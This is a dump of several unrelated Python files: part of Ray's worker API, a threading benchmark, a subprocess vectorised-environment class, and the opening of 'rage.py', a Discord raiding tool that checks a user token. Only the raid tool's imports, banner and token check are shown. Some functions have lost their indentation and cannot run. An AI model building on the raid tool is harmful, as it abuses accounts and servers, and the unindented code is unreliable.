        # functions. The order matters. For example, one of the functions to
        # run may set the Python path, which is needed to import a module used
        # to define a remote function. We may want to change the order to
        # simply be the order in which the exports were defined on the driver.
        # In addition, we will need to retain the ability to decide what the
        # first few exports are (mostly to set the Python path). Additionally,
        # note that the first exports to be defined on the driver will be the
        # ones defined in separate modules that are imported by the driver.
        # Export cached functions_to_run.
        for function in worker.cached_functions_to_run:
            worker.run_function_on_all_workers(function)
    worker.cached_functions_to_run = None
    # Setup tracing here
    if _internal_kv_get(
            "tracing_startup_hook",
            namespace=ray_constants.KV_NAMESPACE_TRACING):
        ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
        if not getattr(ray, "__traced__", False):
            _setup_tracing = import_from_string(
                _internal_kv_get(
                    "tracing_startup_hook",
                    namespace=ray_constants.KV_NAMESPACE_TRACING).decode(
                        "utf-8"))
            _setup_tracing()
            ray.__traced__ = True
def disconnect(exiting_interpreter=False):
    """Disconnect this worker from the raylet and object store.

    Args:
        exiting_interpreter (bool): Currently unused in this function; kept
            so callers (e.g. shutdown()) can pass it uniformly.
    """
    # Reset the list of cached remote functions and actors so that if more
    # remote functions or actors are defined and then connect is called again,
    # the remote functions will be exported. This is mostly relevant for the
    # tests.
    worker = global_worker
    if worker.connected:
        # Shutdown all of the threads that we've started. TODO(rkn): This
        # should be handled cleanly in the worker object's destructor and not
        # in this disconnect method.
        worker.threads_stopped.set()
        if hasattr(worker, "import_thread"):
            worker.import_thread.join_import_thread()
        if hasattr(worker, "listener_thread"):
            # Closing the subscriber unblocks the listener's poll_error()
            # so the join below can complete.
            if hasattr(worker, "gcs_subscriber"):
                worker.gcs_subscriber.close()
            worker.listener_thread.join()
        if hasattr(worker, "logger_thread"):
            worker.logger_thread.join()
        worker.threads_stopped.clear()
        worker._session_index += 1
        global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
    worker.node = None  # Disconnect the worker from the node.
    worker.cached_functions_to_run = []
    worker.serialization_context_map.clear()
    try:
        ray_actor = ray.actor
    except AttributeError:
        ray_actor = None  # This can occur during program termination
    if ray_actor is not None:
        ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
    """Set the process title to `title` for the duration of the context,
    then switch it to `next_title` on exit. No-op in LOCAL_MODE (the mode
    is re-checked on exit as well as on entry)."""
    if _mode() is not LOCAL_MODE:
        setproctitle.setproctitle(title)
    try:
        yield
    finally:
        if _mode() is not LOCAL_MODE:
            setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
    """Display message in dashboard.
    Display message for the current task or actor in the dashboard.
    For example, this can be used to display the status of a long-running
    computation.
    Args:
        message (str): Message to be displayed.
        key (str): The key name for the message. Multiple message under
            different keys will be displayed at the same time. Messages
            under the same key will be overridden.
        dtype (str): The type of message for rendering. One of the
            following: text, html.
    """
    worker = global_worker
    worker.check_connected()
    # NOTE(review): this validation uses `assert`, which is stripped under
    # `python -O`; raising ValueError would be more robust, but callers may
    # rely on AssertionError, so left as-is.
    acceptable_dtypes = {"text", "html"}
    assert dtype in acceptable_dtypes, (
        f"dtype accepts only: {acceptable_dtypes}")
    message_wrapped = {"message": message, "dtype": dtype}
    message_encoded = json.dumps(message_wrapped).encode()
    worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the "blocking ray.get inside
# async actor" warning once per process (see get() below).
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
        *,
        timeout: Optional[float] = None) -> Union[Any, List[Any]]:
    """Get a remote object or a list of remote objects from the object store.
    This method blocks until the object corresponding to the object ref is
    available in the local object store. If this object is not in the local
    object store, it will be shipped from an object store that has it (once the
    object has been created). If object_refs is a list, then the objects
    corresponding to each object in the list will be returned.
    Ordering for an input list of object refs is preserved for each object
    returned. That is, if an object ref to A precedes an object ref to B in the
    input list, then A will precede B in the returned list.
    This method will issue a warning if it's running inside async context,
    you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
    a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
    Args:
        object_refs: Object ref of the object to get or a list of object refs
            to get.
        timeout (Optional[float]): The maximum amount of time in seconds to
            wait before returning.
    Returns:
        A Python object or a list of Python objects.
    Raises:
        GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
            the get takes longer than timeout to return.
        Exception: An exception is raised if the task that created the object
            or that created one of the objects raised an exception.
    """
    worker = global_worker
    worker.check_connected()
    # Warn (once) about blocking the event loop from inside an async actor.
    if hasattr(
            worker,
            "core_worker") and worker.core_worker.current_actor_is_asyncio():
        global blocking_get_inside_async_warned
        if not blocking_get_inside_async_warned:
            logger.warning("Using blocking ray.get inside async actor. "
                           "This blocks the event loop. Please use `await` "
                           "on object ref with asyncio.gather if you want to "
                           "yield execution to the event loop instead.")
            blocking_get_inside_async_warned = True
    with profiling.profile("ray.get"):
        # Normalize a single ref to a one-element list; unwrapped again below.
        is_individual_id = isinstance(object_refs, ray.ObjectRef)
        if is_individual_id:
            object_refs = [object_refs]
        if not isinstance(object_refs, list):
            raise ValueError("'object_refs' must either be an object ref "
                             "or a list of object refs.")
        # TODO(ujvl): Consider how to allow user to retrieve the ready objects.
        values, debugger_breakpoint = worker.get_objects(
            object_refs, timeout=timeout)
        # Re-raise any exception that was stored in place of a value.
        for i, value in enumerate(values):
            if isinstance(value, RayError):
                if isinstance(value, ray.exceptions.ObjectLostError):
                    worker.core_worker.dump_object_store_memory_usage()
                if isinstance(value, RayTaskError):
                    raise value.as_instanceof_cause()
                else:
                    raise value
        if is_individual_id:
            values = values[0]
        # A non-empty debugger_breakpoint token means a breakpoint was hit;
        # attach an interactive Ray debugger session to the caller's frame.
        if debugger_breakpoint != b"":
            frame = sys._getframe().f_back
            rdb = ray.util.pdb.connect_ray_pdb(
                host=None,
                port=None,
                patch_stdstreams=False,
                quiet=None,
                breakpoint_uuid=debugger_breakpoint.decode()
                if debugger_breakpoint else None,
                debugger_external=worker.ray_debugger_external)
            rdb.set_trace(frame=frame)
    return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
        _owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
    """Store an object in the object store.
    The object may not be evicted while a reference to the returned ID exists.
    Args:
        value: The Python object to be stored.
        _owner: The actor that should own this object. This allows creating
            objects with lifetimes decoupled from that of the creating process.
            Note that the owner actor must be passed a reference to the object
            prior to the object creator exiting, otherwise the reference will
            still be lost.
    Returns:
        The object ref assigned to this value.
    Raises:
        TypeError: If ``_owner`` is neither None nor an ActorHandle.
        RuntimeError: If the designated owner actor is no longer alive.
        ObjectStoreFullError: If the value cannot be stored.
    """
    worker = global_worker
    worker.check_connected()
    # Resolve the owner's serialized address (or None for default ownership).
    if _owner is None:
        serialize_owner_address = None
    elif isinstance(_owner, ray.actor.ActorHandle):
        # Ensure `ray.state.state.global_state_accessor` is not None
        ray.state.state._check_connected()
        owner_address = gcs_utils.ActorTableData.FromString(
            ray.state.state.global_state_accessor.get_actor_info(
                _owner._actor_id)).address
        # An empty worker_id in the actor's address means the actor is dead.
        if len(owner_address.worker_id) == 0:
            raise RuntimeError(
                f"{_owner} is not alive, it's worker_id is empty!")
        serialize_owner_address = owner_address.SerializeToString()
    else:
        raise TypeError(
            f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
    with profiling.profile("ray.put"):
        try:
            object_ref = worker.put_object(
                value, owner_address=serialize_owner_address)
        except ObjectStoreFullError:
            logger.info(
                "Put failed since the value was either too large or the "
                "store was full of pinned objects.")
            raise
    return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False


@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
         *,
         num_returns: int = 1,
         timeout: Optional[float] = None,
         fetch_local: bool = True
         ) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
    """Return a list of IDs that are ready and a list of IDs that are not.

    If timeout is set, the function returns either when the requested number of
    IDs are ready or when the timeout is reached, whichever occurs first. If it
    is not set, the function simply waits until that number of objects is ready
    and returns that exact number of object refs.

    This method returns two lists. The first list consists of object refs that
    correspond to objects that are available in the object store. The second
    list corresponds to the rest of the object refs (which may or may not be
    ready).

    Ordering of the input list of object refs is preserved. That is, if A
    precedes B in the input list, and both are in the ready list, then A will
    precede B in the ready list. This also holds true if A and B are both in
    the remaining list.

    This method will issue a warning if it's running inside an async context.
    Instead of ``ray.wait(object_refs)``, you can use
    ``await asyncio.wait(object_refs)``.

    Args:
        object_refs (List[ObjectRef]): List of object refs for objects that may
            or may not be ready. Note that these IDs must be unique.
        num_returns (int): The number of object refs that should be returned.
        timeout (float): The maximum amount of time in seconds to wait before
            returning.
        fetch_local (bool): If True, wait for the object to be downloaded onto
            the local node before returning it as ready. If False, ray.wait()
            will not trigger fetching of objects to the local node and will
            return immediately once the object is available anywhere in the
            cluster.

    Returns:
        A list of object refs that are ready and a list of the remaining object
        IDs.
    """
    worker = global_worker
    worker.check_connected()

    # Warn (once per process) when a blocking wait runs inside an async actor,
    # since it stalls the event loop. timeout == 0 is a non-blocking poll and
    # is therefore exempt from the warning.
    if hasattr(worker,
               "core_worker") and worker.core_worker.current_actor_is_asyncio(
               ) and timeout != 0:
        global blocking_wait_inside_async_warned
        if not blocking_wait_inside_async_warned:
            logger.debug("Using blocking ray.wait inside async method. "
                         "This blocks the event loop. Please use `await` "
                         "on object ref with asyncio.wait. ")
            blocking_wait_inside_async_warned = True

    # Argument validation: a bare ObjectRef is a common caller mistake and
    # gets its own, more specific error message.
    if isinstance(object_refs, ObjectRef):
        raise TypeError(
            "wait() expected a list of ray.ObjectRef, got a single "
            "ray.ObjectRef")

    if not isinstance(object_refs, list):
        raise TypeError("wait() expected a list of ray.ObjectRef, "
                        f"got {type(object_refs)}")

    if timeout is not None and timeout < 0:
        raise ValueError("The 'timeout' argument must be nonnegative. "
                         f"Received {timeout}")

    for object_ref in object_refs:
        if not isinstance(object_ref, ObjectRef):
            raise TypeError("wait() expected a list of ray.ObjectRef, "
                            f"got list containing {type(object_ref)}")

    worker.check_connected()
    # TODO(swang): Check main thread.
    with profiling.profile("ray.wait"):
        # TODO(rkn): This is a temporary workaround for
        # https://github.com/ray-project/ray/issues/997. However, it should be
        # fixed in Arrow instead of here.
        if len(object_refs) == 0:
            return [], []

        if len(object_refs) != len(set(object_refs)):
            raise ValueError("Wait requires a list of unique object refs.")
        if num_returns <= 0:
            raise ValueError(
                "Invalid number of objects to return %d." % num_returns)
        if num_returns > len(object_refs):
            raise ValueError("num_returns cannot be greater than the number "
                             "of objects provided to ray.wait.")

        # No timeout means "wait effectively forever" (10**6 seconds); the
        # core worker API takes milliseconds.
        timeout = timeout if timeout is not None else 10**6
        timeout_milliseconds = int(timeout * 1000)
        ready_ids, remaining_ids = worker.core_worker.wait(
            object_refs,
            num_returns,
            timeout_milliseconds,
            worker.current_task_id,
            fetch_local,
        )
        return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
              namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
    """Get a handle to a named actor.

    Gets a handle to an actor with the given name. The actor must
    have been created with Actor.options(name="name").remote(). This
    works for both detached & non-detached actors.

    Args:
        name: The name of the actor.
        namespace: The namespace of the actor, or None to specify the current
            namespace.

    Returns:
        ActorHandle to the actor.

    Raises:
        ValueError if the named actor does not exist.
    """
    # Guard clauses: reject empty names and malformed namespaces before
    # touching the worker at all.
    if not name:
        raise ValueError("Please supply a non-empty value to get_actor")

    if namespace is not None:
        ray._private.utils.validate_namespace(namespace)

    worker = global_worker
    worker.check_connected()
    # The core worker API expects "" (not None) for the current namespace.
    resolved_namespace = namespace if namespace else ""
    return worker.core_worker.get_named_actor_handle(name, resolved_namespace)
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
    """Kill an actor forcefully.

    This will interrupt any running tasks on the actor, causing them to fail
    immediately. ``atexit`` handlers installed in the actor will not be run.

    If you want to kill the actor but let pending tasks finish,
    you can call ``actor.__ray_terminate__.remote()`` instead to queue a
    termination task. Any ``atexit`` handlers installed in the actor *will*
    be run in this case.

    If the actor is a detached actor, subsequent calls to get its handle via
    ray.get_actor will fail.

    Args:
        actor (ActorHandle): Handle to the actor to kill.
        no_restart (bool): Whether or not this actor should be restarted if
            it's a restartable actor.
    """
    worker = global_worker
    worker.check_connected()
    # Only actor handles can be force-killed; plain object refs go through
    # ray.cancel() instead.
    if not isinstance(actor, ray.actor.ActorHandle):
        raise ValueError("ray.kill() only supported for actors. "
                         f"Got: {type(actor)}.")
    worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
           *,
           force: bool = False,
           recursive: bool = True):
    """Cancels a task according to the following conditions.

    If the specified task is pending execution, it will not be executed. If
    the task is currently executing, the behavior depends on the ``force``
    flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
    and when ``force=True``, the executing task will immediately exit.
    If the task is already finished, nothing will happen.

    Only non-actor tasks can be canceled. Canceled tasks will not be
    retried (max_retries will not be respected).

    Calling ray.get on a canceled task will raise a TaskCancelledError or a
    WorkerCrashedError if ``force=True``.

    Args:
        object_ref (ObjectRef): ObjectRef returned by the task
            that should be canceled.
        force (boolean): Whether to force-kill a running task by killing
            the worker that is running the task.
        recursive (boolean): Whether to try to cancel tasks submitted by the
            task specified.

    Raises:
        TypeError: This is also raised for actor tasks.
    """
    worker = ray.worker.global_worker
    worker.check_connected()

    # Actor-task refs are rejected here: cancellation is only defined for
    # normal (non-actor) tasks.
    if not isinstance(object_ref, ray.ObjectRef):
        raise TypeError(
            "ray.cancel() only supported for non-actor object refs. "
            f"Got: {type(object_ref)}.")

    core_worker = worker.core_worker
    return core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
    """Return the execution mode of *worker* (the global worker by default).

    This indirection exists because the remote decorator calls ``_mode()``
    rather than touching ``worker.mode`` directly: serializing a remote
    function must not attempt to serialize the (unserializable) worker
    object itself.
    """
    current_mode = worker.mode
    return current_mode
def make_decorator(num_returns=None,
                   num_cpus=None,
                   num_gpus=None,
                   memory=None,
                   object_store_memory=None,
                   resources=None,
                   accelerator_type=None,
                   max_calls=None,
                   max_retries=None,
                   max_restarts=None,
                   max_task_retries=None,
                   runtime_env=None,
                   placement_group="default",
                   worker=None,
                   retry_exceptions=None,
                   concurrency_groups=None):
    """Build the decorator that ``@ray.remote`` applies to its target.

    The returned decorator inspects its target: plain (or Cython) functions
    become RemoteFunction objects and classes become actor classes. Keywords
    that only make sense for the other kind of target are rejected, so the
    validation below is split into a function branch and a class branch.
    """

    def decorator(function_or_class):
        # --- Remote function branch (plain or Cython functions). ---
        if (inspect.isfunction(function_or_class)
                or is_cython(function_or_class)):
            # Set the remote function default resources.
            # Actor-only keywords are invalid for functions.
            if max_restarts is not None:
                raise ValueError("The keyword 'max_restarts' is not "
                                 "allowed for remote functions.")
            if max_task_retries is not None:
                raise ValueError("The keyword 'max_task_retries' is not "
                                 "allowed for remote functions.")
            # Range checks; note max_retries permits -1 (infinite retries).
            if num_returns is not None and (not isinstance(num_returns, int)
                                            or num_returns < 0):
                raise ValueError(
                    "The keyword 'num_returns' only accepts 0 or a"
                    " positive integer")
            if max_retries is not None and (not isinstance(max_retries, int)
                                            or max_retries < -1):
                raise ValueError(
                    "The keyword 'max_retries' only accepts 0, -1 or a"
                    " positive integer")
            if max_calls is not None and (not isinstance(max_calls, int)
                                          or max_calls < 0):
                raise ValueError(
                    "The keyword 'max_calls' only accepts 0 or a positive"
                    " integer")
            return ray.remote_function.RemoteFunction(
                Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
                memory, object_store_memory, resources, accelerator_type,
                num_returns, max_calls, max_retries, retry_exceptions,
                runtime_env, placement_group)

        # --- Actor branch (classes). ---
        if inspect.isclass(function_or_class):
            # Function-only keywords are invalid for actors.
            if num_returns is not None:
                raise TypeError("The keyword 'num_returns' is not "
                                "allowed for actors.")
            if max_retries is not None:
                raise TypeError("The keyword 'max_retries' is not "
                                "allowed for actors.")
            if retry_exceptions is not None:
                raise TypeError("The keyword 'retry_exceptions' is not "
                                "allowed for actors.")
            if max_calls is not None:
                raise TypeError("The keyword 'max_calls' is not "
                                "allowed for actors.")
            # -1 means "restart/retry indefinitely" for both options below.
            if max_restarts is not None and (not isinstance(max_restarts, int)
                                             or max_restarts < -1):
                raise ValueError(
                    "The keyword 'max_restarts' only accepts -1, 0 or a"
                    " positive integer")
            if max_task_retries is not None and (not isinstance(
                    max_task_retries, int) or max_task_retries < -1):
                raise ValueError(
                    "The keyword 'max_task_retries' only accepts -1, 0 or a"
                    " positive integer")
            return ray.actor.make_actor(
                function_or_class, num_cpus, num_gpus, memory,
                object_store_memory, resources, accelerator_type, max_restarts,
                max_task_retries, runtime_env, concurrency_groups)

        raise TypeError("The @ray.remote decorator must be applied to "
                        "either a function or to a class.")

    return decorator
@PublicAPI
def remote(*args, **kwargs):
    """Defines a remote function or an actor class.

    This can be used with no arguments to define a remote function or actor as
    follows:

    .. code-block:: python

        @ray.remote
        def f():
            return 1

        @ray.remote
        class Foo:
            def method(self):
                return 1

    It can also be used with specific keyword arguments as follows:

    .. code-block:: python

        @ray.remote(num_gpus=1, max_calls=1, num_returns=2)
        def f():
            return 1, 2

        @ray.remote(num_cpus=2, resources={"CustomResource": 1})
        class Foo:
            def method(self):
                return 1

    Remote task and actor objects returned by @ray.remote can also be
    dynamically modified with the same arguments as above using
    ``.options()`` as follows:

    .. code-block:: python

        @ray.remote(num_gpus=1, max_calls=1, num_returns=2)
        def f():
            return 1, 2
        g = f.options(num_gpus=2, max_calls=None)

        @ray.remote(num_cpus=2, resources={"CustomResource": 1})
        class Foo:
            def method(self):
                return 1
        Bar = Foo.options(num_cpus=1, resources=None)

    Running remote actors will be terminated when the actor handle to them
    in Python is deleted, which will cause them to complete any outstanding
    work and then shut down. If you want to kill them immediately, you can
    also call ``ray.kill(actor)``.

    Args:
        num_returns (int): This is only for *remote functions*. It specifies
            the number of object refs returned by
            the remote function invocation.
        num_cpus (float): The quantity of CPU cores to reserve
            for this task or for the lifetime of the actor.
        num_gpus (int): The quantity of GPUs to reserve
            for this task or for the lifetime of the actor.
        resources (Dict[str, float]): The quantity of various custom resources
            to reserve for this task or for the lifetime of the actor.
            This is a dictionary mapping strings (resource names) to floats.
        accelerator_type: If specified, requires that the task or actor run
            on a node with the specified type of accelerator.
            See `ray.accelerators` for accelerator types.
        max_calls (int): Only for *remote functions*. This specifies the
            maximum number of times that a given worker can execute
            the given remote function before it must exit
            (this can be used to address memory leaks in third-party
            libraries or to reclaim resources that cannot easily be
            released, e.g., GPU memory that was acquired by TensorFlow).
            By default this is infinite.
        max_restarts (int): Only for *actors*. This specifies the maximum
            number of times that the actor should be restarted when it dies
            unexpectedly. The minimum valid value is 0 (default),
            which indicates that the actor doesn't need to be restarted.
            A value of -1 indicates that an actor should be restarted
            indefinitely.
        max_task_retries (int): Only for *actors*. How many times to
            retry an actor task if the task fails due to a system error,
            e.g., the actor has died. If set to -1, the system will
            retry the failed task until the task succeeds, or the actor
            has reached its max_restarts limit. If set to `n > 0`, the
            system will retry the failed task up to n times, after which the
            task will throw a `RayActorError` exception upon :obj:`ray.get`.
            Note that Python exceptions are not considered system errors
            and will not trigger retries.
        max_retries (int): Only for *remote functions*. This specifies
            the maximum number of times that the remote function
            should be rerun when the worker process executing it
            crashes unexpectedly. The minimum valid value is 0,
            the default is 4 (default), and a value of -1 indicates
            infinite retries.
        runtime_env (Dict[str, Any]): Specifies the runtime environment for
            this actor or task and its children. See
            :ref:`runtime-environments` for detailed documentation. This API is
            in beta and may change before becoming stable.
        retry_exceptions (bool): Only for *remote functions*. This specifies
            whether application-level errors should be retried
            up to max_retries times.
    """
    worker = global_worker

    if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
        # This is the case where the decorator is just @ray.remote.
        return make_decorator(worker=worker)(args[0])

    # Parse the keyword arguments from the decorator.
    valid_kwargs = [
        "num_returns",
        "num_cpus",
        "num_gpus",
        "memory",
        "object_store_memory",
        "resources",
        "accelerator_type",
        "max_calls",
        "max_restarts",
        "max_task_retries",
        "max_retries",
        "runtime_env",
        "retry_exceptions",
        "placement_group",
        "concurrency_groups",
    ]
    error_string = ("The @ray.remote decorator must be applied either "
                    "with no arguments and no parentheses, for example "
                    "'@ray.remote', or it must be applied using some of "
                    f"the arguments in the list {valid_kwargs}, for example "
                    "'@ray.remote(num_returns=2, "
                    "resources={\"CustomResource\": 1})'.")
    assert len(args) == 0 and len(kwargs) > 0, error_string
    for key in kwargs:
        assert key in valid_kwargs, error_string

    # Resource arguments. "CPU" and "GPU" must come through the dedicated
    # num_cpus/num_gpus keywords, never through the custom resources dict.
    # (Idiom fix: use dict.get() instead of the "k in d" / d[k] double lookup.)
    num_cpus = kwargs.get("num_cpus")
    num_gpus = kwargs.get("num_gpus")
    resources = kwargs.get("resources")
    if not isinstance(resources, dict) and resources is not None:
        raise TypeError("The 'resources' keyword argument must be a "
                        f"dictionary, but received type {type(resources)}.")
    if resources is not None:
        assert "CPU" not in resources, "Use the 'num_cpus' argument."
        assert "GPU" not in resources, "Use the 'num_gpus' argument."

    accelerator_type = kwargs.get("accelerator_type")

    # Handle other arguments. All default to None (or "default" for
    # placement_group), letting make_decorator distinguish "unset" from a
    # user-supplied value.
    num_returns = kwargs.get("num_returns")
    max_calls = kwargs.get("max_calls")
    max_restarts = kwargs.get("max_restarts")
    max_task_retries = kwargs.get("max_task_retries")
    memory = kwargs.get("memory")
    object_store_memory = kwargs.get("object_store_memory")
    max_retries = kwargs.get("max_retries")
    runtime_env = kwargs.get("runtime_env")
    placement_group = kwargs.get("placement_group", "default")
    retry_exceptions = kwargs.get("retry_exceptions")
    concurrency_groups = kwargs.get("concurrency_groups")

    return make_decorator(
        num_returns=num_returns,
        num_cpus=num_cpus,
        num_gpus=num_gpus,
        memory=memory,
        object_store_memory=object_store_memory,
        resources=resources,
        accelerator_type=accelerator_type,
        max_calls=max_calls,
        max_restarts=max_restarts,
        max_task_retries=max_task_retries,
        max_retries=max_retries,
        runtime_env=runtime_env,
        placement_group=placement_group,
        worker=worker,
        retry_exceptions=retry_exceptions,
        concurrency_groups=concurrency_groups or [])
|
multithreading_test.py | from do_something import *
import time
import threading
if __name__ == "__main__":
    # Benchmark: process `size` items across `threads` worker threads and
    # report the wall-clock time taken.
    start_time = time.time()
    size = 10000000
    threads = 10
    jobs = []
    for i in range(0, threads):
        out_list = list()
        # BUG FIX: the original wrote `target=do_something(size, out_list)`,
        # which *calls* do_something synchronously in the main thread and
        # passes its return value as `target` — so no work happened in the
        # threads at all. Pass the callable and its arguments separately.
        thread = threading.Thread(target=do_something, args=(size, out_list))
        jobs.append(thread)
    for j in jobs:
        j.start()
    for j in jobs:
        j.join()
    print("List processing complete.")
    end_time = time.time()
    print("multithreading time=", end_time - start_time)
|
subproc_vec_env.py | import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
    """Subprocess entry point: run a batch of envs and answer pipe commands.

    Args:
        remote: child end of the pipe; commands arrive here and results are
            sent back on it. The protocol is strictly request/response —
            every recv of a command is answered by exactly one send.
        parent_remote: parent end of the pipe, closed immediately in the
            child so only the parent holds it open.
        env_fn_wrappers: CloudpickleWrapper whose ``.x`` is the list of env
            constructor callables this process runs in series.
    """
    def step_env(env, action):
        # Step a single env; auto-reset on episode end so the returned
        # observation is always valid for the next step.
        ob, reward, done, info = env.step(action)
        if done:
            ob = env.reset()
        return ob, reward, done, info

    parent_remote.close()
    envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
    try:
        while True:
            cmd, data = remote.recv()
            if cmd == 'step':
                # `data` is this process's slice of the batched actions,
                # one action per env handled here.
                remote.send([step_env(env, action) for env, action in zip(envs, data)])
            elif cmd == 'reset':
                remote.send([env.reset() for env in envs])
            elif cmd == 'render':
                remote.send([env.render(mode='rgb_array') for env in envs])
            elif cmd == 'close':
                # No reply is sent for 'close'; just exit the serve loop.
                remote.close()
                break
            elif cmd == 'get_spaces_spec':
                # Spaces are assumed identical across envs; report the first.
                remote.send((envs[0].observation_space, envs[0].action_space, envs[0].spec))
            else:
                raise NotImplementedError
    except KeyboardInterrupt:
        print('SubprocVecEnv worker: got KeyboardInterrupt')
    finally:
        # Always release env resources, even on error or interrupt.
        for env in envs:
            env.close()
class SubprocVecEnv(VecEnv):
    """
    VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
    Recommended to use when num_envs > 1 and step() can be a bottleneck.
    """
    def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
        """
        Arguments:

        env_fns: iterable of callables -  functions that create environments to run in subprocesses. Need to be cloud-pickleable
        in_series: number of environments to run in series in a single process
        (e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
        """
        # `waiting` tracks an outstanding step_async() whose results have not
        # yet been collected by step_wait().
        self.waiting = False
        self.closed = False
        self.in_series = in_series
        nenvs = len(env_fns)
        assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
        self.nremotes = nenvs // in_series
        # Each subprocess gets a contiguous chunk of `in_series` env factories.
        env_fns = np.array_split(env_fns, self.nremotes)
        ctx = mp.get_context(context)
        # One pipe per subprocess: `remotes` are the parent ends,
        # `work_remotes` the child ends.
        self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
        self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            with clear_mpi_env_vars():
                p.start()
        # Close the child ends in the parent so EOF propagates correctly.
        for remote in self.work_remotes:
            remote.close()

        # Query the spaces once from the first subprocess; the worker assumes
        # all envs share them.
        self.remotes[0].send(('get_spaces_spec', None))
        observation_space, action_space, self.spec = self.remotes[0].recv()
        self.viewer = None
        VecEnv.__init__(self, nenvs, observation_space, action_space)

    def step_async(self, actions):
        """Dispatch a batch of actions to the subprocesses without blocking."""
        self._assert_not_closed()
        # Split the batched actions into one chunk per subprocess.
        actions = np.array_split(actions, self.nremotes)
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        self.waiting = True

    def step_wait(self):
        """Collect the results of the previous step_async() call."""
        self._assert_not_closed()
        results = [remote.recv() for remote in self.remotes]
        results = _flatten_list(results)
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos

    def reset(self):
        """Reset every env and return the stacked initial observations."""
        self._assert_not_closed()
        for remote in self.remotes:
            remote.send(('reset', None))
        obs = [remote.recv() for remote in self.remotes]
        obs = _flatten_list(obs)
        return _flatten_obs(obs)

    def close_extras(self):
        """Shut down all subprocesses; called once by VecEnv.close()."""
        self.closed = True
        if self.waiting:
            # Drain any in-flight step results so the 'close' send below is
            # not interleaved with pending replies.
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()

    def get_images(self):
        """Return one rendered RGB frame per environment."""
        self._assert_not_closed()
        for pipe in self.remotes:
            pipe.send(('render', None))
        imgs = [pipe.recv() for pipe in self.remotes]
        imgs = _flatten_list(imgs)
        return imgs

    def _assert_not_closed(self):
        assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"

    def __del__(self):
        # Best-effort cleanup if the caller forgot to close() explicitly.
        if not self.closed:
            self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
rage.py | #SKID THIS = BLACKLISTED! <3
#RAGE was made by ††#7777 | discord.gg/raided
import os, sys, time, requests, os.path, base64, json, threading, string, random, discord, asyncio, httpx, pyautogui, re, http.client, subprocess, shutil
from discord_webhook import DiscordWebhook
from itertools import cycle
from discord.ext import commands
from selenium import webdriver
from datetime import datetime
from PIL import Image
from bs4 import BeautifulSoup
from random import randint
import emoji as ej
import lxml
def title():
os.system('cls' if os.name == 'nt' else 'clear')
print(f"""\n\n
\t\t\t\t ██▀███ ▄▄▄ ▄████ ▓█████
\t\t\t\t ▓██ ▒ ██▒▒████▄ ██▒ ▀█ ▓█ ▀
\t\t\t\t ▓██ ░▄█ ▒▒██ ▀█▄ ▒██░▄▄▄ ▒███
\t\t\t\t ▒██▀▀█▄ ░██▄▄▄▄██░▓█ ██ ▒▓█ ▄
\t\t\t\t ░██▓ ▒██▒▒▓█ ▓██▒▓███▀▒▒░▒████
\t\t\t\t ░ ▒▓ ░▒▓░░▒▒ ▓▒█░▒ ▒ ░░░ ▒░
\t\t\t\t ░▒ ░ ▒ ░ ░ ▒▒ ░ ░ ░ ░ ░
\t\t\t\t ░░ ░ ░ ▒ ░ ░ ░
\t\t\t\t ░ ░ ░ ░ ░
\t\t\t\t
\t\t\t\t> Made by ††#7777 | discord.gg/raided \n\n\n\n""")
def checkvalidity():
src = requests.get('https://discordapp.com/api/v6/auth/login', headers={'Authorization': usertoken})
if src.status_code == 200:
